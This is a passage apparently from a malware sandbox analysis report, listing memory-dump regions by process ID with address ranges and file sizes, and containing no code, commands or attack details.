                                                                                                                                                                                                                                                                                          • memory/3844-308-0x0000000002D20000-0x0000000002E6A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                          • memory/3844-323-0x0000000000400000-0x0000000002D1A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            41.1MB

                                                                                                                                                                                                                                                                                          • memory/3844-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/3900-114-0x0000000003FD0000-0x000000000410F000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                                          • memory/4108-387-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4272-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4324-485-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4388-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4388-303-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                          • memory/4400-368-0x0000000000400000-0x0000000002CC7000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            40.8MB

                                                                                                                                                                                                                                                                                          • memory/4400-345-0x0000000002CD0000-0x0000000002D7E000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            696KB

                                                                                                                                                                                                                                                                                          • memory/4400-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4424-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4424-253-0x0000000077870000-0x00000000779FE000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                          • memory/4424-286-0x0000000005C90000-0x0000000005C91000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                          • memory/4456-336-0x0000000007320000-0x0000000007321000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                          • memory/4456-331-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            40.8MB

                                                                                                                                                                                                                                                                                          • memory/4456-343-0x0000000007322000-0x0000000007323000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                          • memory/4456-363-0x0000000007324000-0x0000000007326000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                          • memory/4456-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4456-320-0x0000000002D50000-0x0000000002E9A000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                          • memory/4456-346-0x0000000007323000-0x0000000007324000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                          • memory/4488-283-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                          • memory/4488-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4488-249-0x0000000077870000-0x00000000779FE000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                          • memory/4524-234-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                                                          • memory/4524-236-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4524-252-0x0000000005750000-0x0000000005D56000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                          • memory/4568-263-0x0000000004EA0000-0x000000000539E000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                                                                          • memory/4568-235-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            128KB

                                                                                                                                                                                                                                                                                          • memory/4568-237-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4640-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4924-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4932-481-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/4968-499-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5024-270-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5072-273-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5160-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5216-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5276-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5336-515-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5560-476-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5588-512-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5624-501-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5716-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5724-602-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5760-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5772-448-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5788-449-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5808-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/5912-458-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6060-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6160-516-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6172-517-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6204-519-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6232-521-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6264-524-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6316-526-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6360-528-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6384-531-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6400-532-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                          • memory/6668-546-0x0000000000000000-mapping.dmp